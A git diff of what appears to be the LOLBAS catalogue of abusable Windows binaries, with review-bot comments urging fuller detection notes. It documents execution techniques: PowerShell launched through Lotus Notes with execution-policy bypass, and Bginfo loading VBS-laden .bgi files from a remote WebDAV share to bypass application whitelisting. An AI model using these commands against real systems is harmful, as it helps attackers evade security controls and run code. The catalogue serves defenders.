Merge branch 'master' into master
commit
388b6a64ac
@ -92,6 +92,8 @@ If you are missing from the acknowledgement, please let me know (I did not forge
# OTHER NON MICROSOFT BINARIES
[Gpup.exe](OtherBinaries/Gpup.md)
[Nlnotes.exe](OtherBinaries/Nlnotes.md)
[Notes.exe](OtherBinaries/Notes.md)
[Nvuhda6.exe](OtherBinaries/Nvuhda6.md)
[Nvudisp.exe](OtherBinaries/Nvudisp.md)
[VBoxDrvInst.exe](OtherBinaries/VBoxDrvInst.md)
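Review bot: the new index links six files under OtherBinaries/ (Gpup.md, Nlnotes.md, Notes.md, Nvuhda6.md, Nvudisp.md, VBoxDrvInst.md), but this commit only creates Nlnotes.md and Notes.md; check that the other four already exist in the tree, otherwise these links dangle. The heading level is also inconsistent with the rest of the README, which uses `##` for its sections (`## STORY`); `## OTHER NON-MICROSOFT BINARIES` would match.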
@ -8,12 +8,14 @@ rundll32 syssetup,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\calc.IN
Acknowledgements:
* Pierre-Alexandre Braeken - @pabraeken
* Matt harr0ey - @harr0ey
Code sample:
*
Resources:
* https://twitter.com/pabraeken/status/994392481927258113
* https://twitter.com/harr0ey/status/975350238184697857
Full path:
```
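Review bot: the `Code sample:` section still carries an empty `*` bullet, which renders as a stray list marker; drop it or point it at the sample the new acknowledgements refer to. The two `Resources:` entries are bare tweet URLs; one phrase each describing what they show (the hunk header suggests the `rundll32 syssetup,SetupInfObjectInstallAction DefaultInstall` invocation) would keep the entry useful if the tweets are deleted.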
@ -0,0 +1,31 @@
## Nlnotes.exe
* Functions: Execute
```
NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
```
Acknowledgements:
* Daniel Bohannon - @danielhbohannon
Code sample:
*
Resources:
* https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
* https://twitter.com/HanseSecure/status/995578436059127808
Full path:
```
?
```
Notes:
Used by Lotus Notes
Detection:
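Review bot: `Full path:` is left as `?` and `Detection:` is empty, so the entry documents the technique but gives defenders nothing to act on. Suggest at least recording the hook that the example itself shows: nlnotes.exe started with `-Command` and `Set-ExecutionPolicy -Scope Process Bypass` on its command line is not part of a normal Lotus Notes launch and is the thing to alert on. For the path, the sibling Notes.md in this same commit gives `C:\Program Files (x86)\IBM\Lotus\Notes\notes.exe`; if nlnotes.exe ships in that directory, fill it in, otherwise use `No fixed path` as Bginfo.md does rather than `?`.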
@ -0,0 +1,31 @@
## Notes.exe
* Functions: Execute
```
Notes.exe" "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
```
Acknowledgements:
* Daniel Bohannon - @danielhbohannon
Code sample:
*
Resources:
* https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
* https://twitter.com/HanseSecure/status/995578436059127808
Full path:
```
C:\Program Files (x86)\IBM\Lotus\Notes\notes.exe
```
Notes:
Used by Lotus Notes
Detection:
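Review bot: the example command line opens with `Notes.exe" "=N:\Lotus\Notes\Data\notes.ini"`, which leaves an unmatched `"` after `Notes.exe`; either quote the executable path on both sides or drop the stray quote so the line has the same shape as the Nlnotes.md example (`NLNOTES.EXE /authenticate "=N:\..."`). As in Nlnotes.md, `Detection:` is empty; the same command-line indicator (`-Command` together with `Set-ExecutionPolicy ... Bypass`) applies here and is worth writing down. It would also help to state whether the `/authenticate` switch used in the Nlnotes.md example is needed for notes.exe, since both entries cite the same gist.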
@ -3,11 +3,35 @@
* Functions: Execute
```
bginfo.exe bginfo.bgi /popup /nolicprompt
(Add vbs code inside .bgi file)
bginfo.exe bginfo.bgi /popup /nolicprompt
"\\10.10.10.10\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt
"\\live.sysinternals.com\Tools\bginfo.exe" \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
```
Acknowledgements:
* Oddvar Moe - @oddvarmoe
Code sample:
* https://github.com/api0cradle/BGInfo/blob/master/BGITool_1.0.ps1
Resources:
* https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
* https://oddvar.moe/2017/05/22/clarification-bginfo-4-22-applocker-still-vulnerable/
* https://twitter.com/Oddvarmoe/status/865330067630694400
* https://twitter.com/ItsReallyNick/status/996133093613424641
* https://github.com/3gstudent/bgi-creater
* https://pentestlab.blog/2017/06/05/applocker-bypass-bginfo/
Full path:
```
No fixed path
```
Notes:
Used to set background image in Windows with details about the environment
Detection:
Bginfo.exe requesting files externally or running VBS scripts.
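Review bot: the code block repeats `bginfo.exe bginfo.bgi /popup /nolicprompt` on both sides of `(Add vbs code inside .bgi file)`, and that parenthetical is prose sitting inside the fence; keep one copy of the command and move the note about the VBS payload living in the .bgi file above the block (or make it a comment), otherwise the page reads as four distinct invocations when there are three. The `Detection:` line could be more concrete given the examples that follow it: bginfo.exe launched from a UNC or WebDAV path, or handed a .bgi argument on a remote share (`\\10.10.10.10\webdav\...`, `\\live.sysinternals.com\Tools\...`), is exactly the external request it describes, and the loaded .bgi file is where the script lives. Minor: three blank lines between the acknowledgement and `Code sample:`.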
@ -34,7 +34,7 @@ Also, please be patient if it takes some time for your contribution to be added
Every binary, script and library has it's own .md file in the subfolders. That way I should be easier to maintain and reuse.
I have borrowed examples from the community (And a lot from Red Canary - Atomic Red Team - Thanks @subtee)
Would really love if the community could contribute as much as possible. That would make it better for everyone.
If you think it is hard to make a pull request using github, don't hasitate to send me a tweet and I will add the contribution for you.
If you think it is hard to make a pull request using github, don't hesitate to send me a tweet and I will add the contribution for you.
## STORY
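Review bot: the fix here is only `hasitate` to `hesitate`, but the unchanged context line in the same paragraph still reads `Every binary, script and library has it's own .md file ... That way I should be easier to maintain and reuse.`; `it's` should be `its` and `I should be` should be `it should be`. Worth folding into this typo pass while the paragraph is being touched.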
@ -78,4 +78,4 @@ Love this logo:
- [ ] Map it to the Mitre Att&ck <3
- [ ] LOLGuiBins
- [ ] More list based on classifications
- [ ] LOLBAS lists for Linux? OSX?
- [ ] LOLBAS lists for Linux? OSX?
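Review bot: the removed and added versions of `- [ ] LOLBAS lists for Linux? OSX?` are textually identical, so this `-78,4 +78,4` hunk is a whitespace or line-ending change only (trailing newline or CRLF); confirm it is intended, since it adds noise to the history for no visible change. While here, `Mitre Att&ck` in the first checklist item is normally written `MITRE ATT&CK`.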